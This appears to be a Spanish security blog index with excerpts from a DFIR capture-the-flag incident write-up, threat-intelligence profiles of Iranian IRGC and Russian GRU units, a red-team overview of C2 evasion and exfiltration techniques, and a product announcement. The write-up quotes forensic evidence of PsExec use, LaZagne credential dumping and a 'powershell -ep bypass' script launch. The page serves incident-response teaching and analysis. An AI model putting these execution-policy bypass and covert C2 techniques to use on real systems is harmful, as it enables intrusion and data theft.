╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ Top medium alerts:                     Top low alerts:                                                     │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ ISO Image Mounted (167)                n/a                                                                 │

│ Reg Key Value Set (Sysmon Alert) (8)   n/a                                                                 │

│ HackTool – LaZagne Execution (7)       n/a                                                                 │

│ Log File Cleared (2)                   n/a                                                                 │

│ Net Conn (Sysmon Alert) (2)            n/a                                                                 │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

Se revisan las alertas sin encontrar actividad maliciosa.

Se extrae la MFT del triaje, se convierte de binario a .csv con la herramienta mftdump, y se revisan los ficheros creados el 22/03/2024, encontrando los siguientes de interés:

1) Ejecución de PSEXEC: se observa la creación del servicio de psexec, empleado para la ejecución remota de código:

2024-03-22 11:41:07         2024-03-22 11:47:57  2024-03-22 11:41:07  2024-03-22 11:41:07  193984       exe      \Windows\PSEXESVC.exe

2024-03-22 11:41:39         2024-03-22 11:41:39  2024-03-22 11:41:39  2024-03-22 11:41:39  4290    pf       \Windows\Prefetch\PSEXESVC.EXE-AD70946C.pf

El hecho de encontrar el binario PSEXESVC.exe, así como el mismo binario en el Prefetch indica que este equipo es el que ha recibido la ejecución del comando. Se revisan los logs de eventos de System, pero han sido borrados por lo que a priori no se puede saber el origen de la comunicación.

Dado que se tienen la RAM del equipo, se hace uso del plugin windows.netscan.NetScan de Volatility para extraer las conexiones de red, pero no se encuentra ninguna conexión entrante al puerto 445/tcp (signo del uso de psexec).

Se ejecuta el comando de Linux strings realizando una búsqueda de proximidad (-A 10 –B 10 para sacar las diez líneas anteriores y posteriores a cada coincidencia), encontrando otro fichero de interés:

459592846 C:\Windows\PSEXESVC.exe

459592872 C:\Windows\PSEXESVC.exe

459593012 Collected Data

459593045 5736:133555812896042651

459593076        C:\Windows\System32\services.exe

459593113 812:133555366942172371

459593145 C:\Windows\System32\csrss.exe

459593177 596:133555366938091543

459593207       9C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

459593268 -“powershell” -ep bypass -NoExit C:\update.ps1

El fichero está en la MFT del equipo, y ha sido creado en el entorno del incidente:

2024-03-22 11:40:09                2024-03-22 12:17:53      2024-03-22 11:39:25       2024-03-22 11:39:25       278         ps1         \update.ps1

[Read more…]

Baklava CTF Writeup – Incident Report Style (I)

Contenido

  1. ¡WARNING! ¡LÉEME PRIMERO!
  2. Resumen ejecutivo.
  3. Antecedentes.
  4. Gestión del incidente
    • 4.1. DC02 – 192.168.20.46
    • 4.2. WS02 – 192.168.20.42
    • 4.3. WS01 – 192.168.20.41
    • 4.4. SRV01
  5. Conclusiones finales.
  6. Línea temporal del ataque.
  7. Impacto.
  8. Atribución.
  9. Lecciones aprendidas.
  10. Anexo A: IOC.
  11. FAQ (del meta, no del incidente).

Informe de Incidente BAKLAVA Parte 1

1. ¡WARNING! ¡LÉEME PRIMERO!

Este documento que estás leyendo es un informe “real” de un incidente ficticio, basado en el CTF DFIR que los compañeros Andrés Yedra y Arturo Martínez (unos fieras) montaron hace poco y que puedes encontrar aquí: https://ctf.communia.cc (y que por supuesto puedes jugar, aunque si piensas hacerlo deja de seguir leyendo porque los spoilers son más que abundantes y se pierde toda la gracia…)

Me han pedido en muchas ocasiones un “documento de ejemplo” de gestión de un incidente, tanto desde la parte de cómo investigarlo como de la parte de cómo redactarlo. En S2 Grupo tenemos como … muchos de esos documentos, pero aunque tengas todo el cuidado del mundo anonimizándolos siempre se corre un riesgo, así que hemos decidido partir de un incidente sintético. Disfruta y aprende, que el gusanillo del DFIR tiene lo suyo ;)

[Nota: todo lo que veais entre corchetes como notas… son eso, notas que no aparecerían en un documento formal, pero que creo que son de utilidad para aclarar alguna duda y sacarle el máximo provecho al análisis].

2. Resumen ejecutivo

El 22 de marzo de 2024 a las 15:30h Megacorp entra en contacto con nosotros porque ha sufrido un incidente de ransomware. Se despliega un equipo de respuesta ante incidentes, que obtiene evidencias de varios de los servidores y puestos de usuario de la Organización

Los análisis llevados a cabo permiten determinar que los atacantes enviaron un correo malicioso a uno de los usuarios de la Organización. Dicho correo tenía un enlace a un documento malicioso, que el usuario abrió infectando su puesto de usuario.

Los atacantes fueron capaces de obtener privilegios gracias a un fallo en los permisos de un directorio del equipo, y gracias a esos privilegios pudieron infectar otro equipo de usuario.

En dicho equipo realizan un ataque contra el dominio Windows que les permite obtener otro usuario privilegiado, con el que inician sesión en el servidor de datos, deshabilitan el antivirus y obtienen las credenciales existentes en el mismo.  De la misma forma, con otro usuario privilegiado logran robar una copia de todos los datos de las cuentas de usuario de la Organización (incluida una copia cifrada de las contraseñas).

Con dichas credenciales inician sesión en el controlador de dominio, y roban una base de datos de contraseñas empleada por IT (fichero de KeePass). A continuación, descargan el ransomware y lo detonan, cifrando ficheros del servidor.

Se tiene una confianza alta de que los atacantes no han realizado más actividades maliciosas en otros equipos de la Organización. Sin embargo, se recomienda un cambio generalizado de todas las contraseñas (con énfasis en aquellas cuentas con privilegios), así como restaurar desde las copias de seguridad de los servidores a una fecha anterior a las 13:00h del 22 de marzo de 2024.

[Read more…]

Irán IRGC – una visita a sus operaciones ciber más interesantes. Un antes y después del inicio de la guerra de Hamas e Israel

Este artículo es la segunda entrega de la serie dedicada a explorar los Actores Estado más activos de los últimos años, con el propósito de comprender en profundidad sus operaciones, modus operandi, victimología y otros aspectos clave. En esta entrega, revisaremos las operaciones ciber de los Cuerpos de la Guardia Revolucionaria Islámica de Irán (IRGC).

Antes de profundizar en el tema, es clave entender cómo está estructurado el gobierno de Irán en la actualidad, ya que su configuración influye directamente en su política y estrategia.

Esta se basa en la distribución de poder. En primer lugar, el Líder Supremo es el máximo responsable en las Fuerzas Armadas y tiene el poder de declarar la guerra o aprobar operaciones militares, entre otras. Antes de declarar cualquier operación militar, este informa al Consejo Supremo de Seguridad Nacional (SCNS), quien es el cuerpo responsable de la política exterior y doméstica, y está compuesto por sus secretarios, asignados por el Líder Supremo, y comandantes o miembros de diferentes instituciones  militares y servicios de seguridad iraníes.

El SCNS informa tanto al Staff General de las Fuerzas Armadas, como al Mando de Khatemolanbia (KCHP), quienes, a su vez, se comunicarán con sus servicios correspondientes, ya sean el IRGC (principal ejército de Irán) o ARTESH. Por otro lado, Irán también tiene un presidente al frente del poder ejecutivo; sin embargo, este no ejerce control sobre las fuerzas armadas, lo que lo convierte en el único país donde el poder ejecutivo carece de dicha autoridad, según agencias públicas de EE. UU.

Ilustración 1: Estructura militar de Irán.
[Read more…]

GRU: unidad militar 54777

Las principales unidades del GRU ruso activas en operaciones en el ciberespacio han sido tratadas en este blog: desde nuestros antiguos posts (¡de 2018!) sobre la unidad 26165 y la unidad 74455 hasta la reciente aparición (en el ciberespacio) de la unidad 29155. Todas estas unidades tienen algo en común, aparte de su capacidad para operar en el ciberespacio: todas tienen un nombre de grupo APT. La unidad 26165 se identifica con APT28, mientras que la unidad 74455 es conocida como Sandworm Team y la unidad 29155 como Ember Bear (nótese el caos en la nomenclatura de grupos APT al que ya hemos hecho referencia en este blog). Sin embargo, no todas las unidades del GRU que operan en el ciberespacio tienen el honor de tener un grupo APT asignado. En este post hablamos de la unidad 54777, una unidad militar del GRU involucrada en operaciones psicológicas (PSYOP), también a través del ciberespacio pero que, por ahora, no tiene un nombre de grupo APT asociado.

La Unión Soviética, y ahora Rusia, tiene una larga trayectoria en el ámbito de la desinformación y la guerra psicológica. De hecho, el objetivo de la “confrontación de información” es influenciar la percepción y el comportamiento del enemigo, de la población y de la comunidad internacional. La guerra psicológica se ha utilizado desde los orígenes de la inteligencia soviética, por parte del fundador de la Cheka, Felix DZERZHINSKI, hasta el conflicto actual con Ucrania. Para destacar la importancia de la guerra psicológica en la Rusia moderna, sólo un detalle: Aleksandr Gennadyevich STARUNSKY, antiguo responsable de la unidad militar 54777 de la que vamos a hablar aquí, fue ascendido por el propio Vladimir PUTIN al comité científico, bajo el Consejo de Seguridad de la Federación Rusa.

El GRU soviético, y el Ejército Rojo en su conjunto, consideraban la propaganda especial como parte de sus medidas activas. A pesar de que esta propaganda iba supuestamente dirigida a influenciar a las tropas enemigas, el régimen soviético la utilizó para subir la moral a sus propias tropas. Cuando la Unión Soviética se desmoronó, la Dirección de Propaganda Especial, responsable de las operaciones psicológicas militares, fue transferida al GRU, y unos años después, en 1994, se estableció como la unidad militar 54777. Esta transferencia no fue un asunto puramente burocrático: hizo las operaciones psicológicas rusas más agresivas de lo que eran en la época soviética. Mientras que en tiempos soviéticos las unidades de propaganda especial operaban exclusivamente durante las campañas militares, al menos teóricamente, con la transferencia al GRU estas operaciones comenzaron a ejecutarse tanto en tiempos de guerra como en tiempos de paz.

La unidad militar 54777 (VCh 54777, 72nd Special Service Center, 72nd Main Intelligence Information Center -GRITs- o Foreign Information and Communications Service), es todavía la responsable de las operaciones psicológicas del GRU. En la página web de Agentura, y en los conocidos como Aquarium Leaks, podemos encontrar una descripción detallada de esta unidad, junto a los históricos esfuerzos soviéticos, y actuales rusos, en el ámbito de la propaganda y la guerra psicológica.

Entre sus operaciones más destacadas, la unidad 54777 ha estado involucrada en campañas de desinformación acerca de la anexión rusa de Crimea en 2014, de la guerra civil en Siria y del conflicto en Ucrania. En tiempos de paz, esta unidad ha estado involucrada en operaciones contra elecciones en Europa y Estados Unidos, así como en campañas de desinformación acerca de la pandemia de COVID-19.

Además de PSYOP “tradicional”, la unidad 54777 incluye tanto capacidades SIGINT como capacidades en el ciberespacio. En el ámbito de la inteligencia de señales, esta unidad obtiene y analiza comunicaciones para generar inteligencia que pueda ser posteriormente utilizada en campañas de desinformación e influencia. En el ciberespacio, la unidad 54777 trabaja complementando las operaciones en el ciberespacio no sólo con PSYOP digitales: sus actividades incluyen operaciones de apoyo a unidades “ciber” del GRU, creación y diseminación de versiones falsas de sus propias operaciones en el ciberespacio, así como guerra electrónica y operaciones psicológicas en el nivel táctico.

La unidad 54777 lleva a cabo la mayor parte de sus operaciones en el ciberespacio a través de redes sociales, una actividad que comenzó con la revolución del Maidan. Además de redes sociales, esta unidad disemina desinformación y manipula a la opinión pública a través de plataformas digitales y foros públicos. Utiliza diferentes organizaciones pantalla, incluyendo InfoRos y el Instituto de la Diáspora Rusa, fundados por Aleksandr Gennadyevich STARUNSKY (a quien ya hemos hecho referencia). Estas organizaciones son “agencias de información” focalizadas en la vida política, económica y social de la Federación Rusa y otras ex Repúblicas Soviéticas, generando contenido tanto en ruso como en inglés.

Probablemente, la unidad 54777 está localizada en la 12ª Dirección del GRU, focalizada en operaciones de información. Supuestamente esta unidad está dirigida por la unidad 55111, que trataremos en otro post. De hecho, Aleksandr Gennadyevich STARUNSKY, antiguo mando de la unidad 54777, era el comandante adjunto de la unidad 55111 cuando fue ascendido al comité científico del Consejo de Seguridad. Según fuentes abiertas, la unidad 54777 tiene, o ha tenido, diferentes unidades encargadas de las operaciones psicológicas en cada distrito militar ruso, además del de Moscú:

  • Distrito militar de Leningrado: unidad militar 03126, localizada en la region de Leningrado.
  • Distrito militar central: unidad militar 03138, localizada en Yekaterinburgo.
  • Distrito militar sur: unidad militar 03128, localizada en Rostov del Don.
  • Distrito militar este: unidad militar 03134, localizada en Jabárovsk.

Una característica de todas estas unidades es su emblema: una combinación del símbolo internacional de la psicología, Ψ (“Psi”), y un clavel rojo, símbolo heráldico de la inteligencia militar rusa, tal y como muestra la imagen (de la web de Agentura):

GRU: Forest Blizzard – una visita a sus operaciones más interesantes desde el inicio de la guerra con Ucrania

Este artículo marca el inicio de una serie dedicada a explorar los Actores Estados más activos de los últimos años, con el propósito de comprender en profundidad sus operaciones, modus operandi, victimología y otros aspectos clave. En esta primera entrega, analizaremos el clúster Forest Blizzard y algunas de sus operaciones desde el inicio del conflicto entre Rusia y Ucrania en 2022.

El clúster Forest Blizzard – también conocido como APT28 o Fancy Bear – ha sido atribuido de forma colectiva por el Servicio de investigación del Congreso de EEUU a las unidades 26165, 74455 y 54777 del Directorio Principal del Alto Estado Mayor de las Fuerzas Armadas de la Federación de Rusia (GRU). Estas unidades han sido identificadas como responsables de diversas operaciones ofensivas y de campañas de  desinformación. En concreto, la unidad 26165 ha estado implicada en operaciones a entidades políticas estadounidenses, como el Comité Nacional Demócrata junto a otras entidades como el IRA (Internet Research Agency) y el SVR (Servicio de Inteligencia Exterior), mientras que la Unidad 74455 ha realizado ciberataques como el malware NotPetya en 2017, o la liberación de correos electrónicos robados durante las elecciones presidenciales de 2016. Por su parte, la Unidad 54777, conocida como el 72º Centro de Servicios Especiales, se ha focalizado en operaciones psicológicas y campañas de desinformación a gran escala. La siguiente imagen muestra la estructura jerárquica de las organizaciones de inteligencia y sus respectivos clústers, basada en los análisis realizados por múltiples agencias de inteligencia gubernamentales y privadas.

Ilustración 1: Organizaciones de inteligencia con capacidades ciber
[Read more…]

C2: La clave oculta en las operaciones de Red Team

Dentro de un ejercicio de Red Team, el Command and Control (C2) actúa como el engranaje principal dentro de la Cyber Kill Chain, ya que permite al adversario mantener el control sobre los sistemas comprometidos y, de esta manera, facilitar la obtención del control completo de la infraestructura de una organización.

Importancia

Un C2 permite desplegar un punto de control dentro de un ejercicio donde se prioriza el sigilo, de manera que crea el entorno clave de dominio sobre los defensores, dado que otorga un sistema de comunicación encubierta sobre los sistemas infectados. De esta manera, proporciona una serie de ventajas a un atacante, dado que permite efectuar comandos, exfiltrar datos sensibles y expandir su presencia por la red sin llegar a ser detectados.

Extrapolemos los puntos claves de un C2:

  1. Persistencia, dado que permite mantener un control sobre los sistemas comprometidos a largo plazo.
  2. Exfiltración, dado que permite extraer información de las redes víctimas sin llegar a ser detectado.
  3. Pivoting, dado que permite realizar movimientos laterales para poder desplazarse y explotar sistemas de redes adyacentes.

Técnicas Implementadas

El objetivo de un C2 es mantener una comunicación continua y encubierta con los sistemas comprometidos por el Red Team. Con este objetivo en mente, implementan técnicas como las siguientes:

  • Tunelización DNS: Permite la transmisión de datos a través de la encapsulación de los mismos mediante el protocolo DNS. Abusa de la confianza de la esencialidad del tráfico DNS en las redes corporativas, que generalmente suele estar permitido por los diferentes dispositivos de seguridad.
  • C2 basado en HTTPS: Permite el establecimiento de la comunicación cifradas mediante HTTPS entre el atacante y el sistema comprometido. Con esta técnica se permite camuflar el tráfico malicioso del atacante con el tráfico web legítimo.
  • Beaconing: Permite la comunicación mediante beacons a intervalos regulares o aleatorios, desde el sistema comprometido al C2. Normalmente se debe hacer una instalación de un implante malware en el sistema comprometido, pero la ventaja que tiene es que ayuda a evitar aquellos sistemas de seguridad más avanzados que se basan en una detección por patrones.
  • C2 en Cloud: Permite la comunicación con el C2 mediante el uso de servicios cloud, como AWS, Drive, Dropbox, Azure, entre otros. La ventaja radica en que, si se ha detectado el uso de una de estas tecnologías durante la fase de reconocimiento, sería una buena aproximación utilizar está técnica para camuflar el tráfico malicioso como operaciones normales del usuario.
  • C2 Satelital[1]: Es una técnica donde se establece la comunicación entre el C2 y los sistemas comprometidos haciendo uso de enlaces satelitales. Este escenario requiere un alto nivel de sofisticación y recursos; sin embargo, proporciona un grado elevado de sigilo e indetectabilidad frente a los equipos de seguridad de las organizaciones. Este modelo tiene varias ventajas:
    • El tráfico C2 pasa a través de redes satelitales, evitando las rutas de internet convencionales. El rastreo de una dirección IP asociada a comunicaciones satelitales hacia una ubicación física resulta sumamente complejo de realizar.
    • Permite la simultaneidad en la unidireccionalidad y bidireccionalidad de la comunicación C2 según convenga. De este modo, reduce la posibilidad de ser detectado y facilita tanto el envío de comandos como la exfiltración de datos.
  • P2P: Este modelo es interesante, dado que implica la generación de redes P2P entre los sistemas comprometidos para que se comuniquen directamente entre sí, de esta manera formando una red descentralizada. Esta técnica elimina la necesidad de un servidor C2 centralizado, aumentando la resiliencia de la red maliciosa.
[Read more…]

GRU: unidad militar 29155

Históricamente, la unidad militar 29155 del GRU ruso (VCh 29155, 161st Specialist Training Center) ha estado involucrada en medidas activas como subversión, asesinatos o sabotaje. Recordemos que las medidas activas soviéticas o rusas hacen referencia a operaciones encubiertas con el objetivo de influenciar la política o la opinión pública de terceros países. Estas medidas incluyen desde actividades en el ciberespacio hasta “wet stuff” (una mala traducción sería “cosas que manchan las manos”: asesinatos, chantajes, sabotajes…). Entre otras operaciones famosas de esta unidad destacan el sabotaje de un depósito de armas en República Checa (2014), un golpe de estado en Montenegro (2016) o el intento de envenenamiento de los Skripal en Salisbury (2018).

A pesar de que la unidad 29155 era conocida por los analistas, su existencia saltó a medios generalistas cuando se acusó a esta unidad de ser la causante del “Síndrome de la Habana”. Este síndrome se identificó entre diplomáticos y personal de inteligencia estadounidense y canadiense destinado en Cuba, en 2016, y sus síntomas se replicaron en otras partes del mundo. Estos síntomas incluyen problemas visuales, vértigo o dificultades cognitivas que se manifiestan, según los afectados, tras haber escuchado sonidos extraños. Desde que se descubrió el síndrome de La Habana, su origen ha sido controvertido. Diferentes estudios lo han asociado a actividades de la inteligencia rusa relacionadas con armamento de nueva generación, desde armas acústicas a energía dirigida.

[Read more…]

CARMEN: La herramienta avanzada de detección de amenazas de S2 Grupo

En el dinámico y siempre cambiante entorno de la ciberseguridad, adelantarse a las amenazas es más crucial que nunca.

En S2 Grupo, en colaboración con el Centro Criptológico Nacional (CCN), hemos desarrollado y mejorado continuamente CARMEN, una herramienta innovadora diseñada para proteger a las organizaciones frente a las amenazas más sofisticadas.

¿Qué es CARMEN?

CARMEN (Centro de Análisis de Registros y Minería de Datos), es una solución integral para la detección y respuesta ante amenazas, específicamente diseñada para hacer frente a la evolución de las amenazas persistentes avanzadas (APTs). Esta herramienta es fundamental para los procesos de Threat Hunting, permitiendo a los equipos de seguridad identificar y neutralizar riesgos de manera proactiva.

El principal objetivo de CARMEN es generar inteligencia a partir del tráfico de red y las actividades de los usuarios dentro de la organización, filtrando y priorizando la información crítica. De esta manera, ayuda a evitar brechas de seguridad y a mitigar el impacto de los ciberataques. Con CARMEN, las organizaciones logran una visibilidad total de su infraestructura, facilitando tanto la detección temprana de amenazas como una respuesta ágil y efectiva.

[Read more…]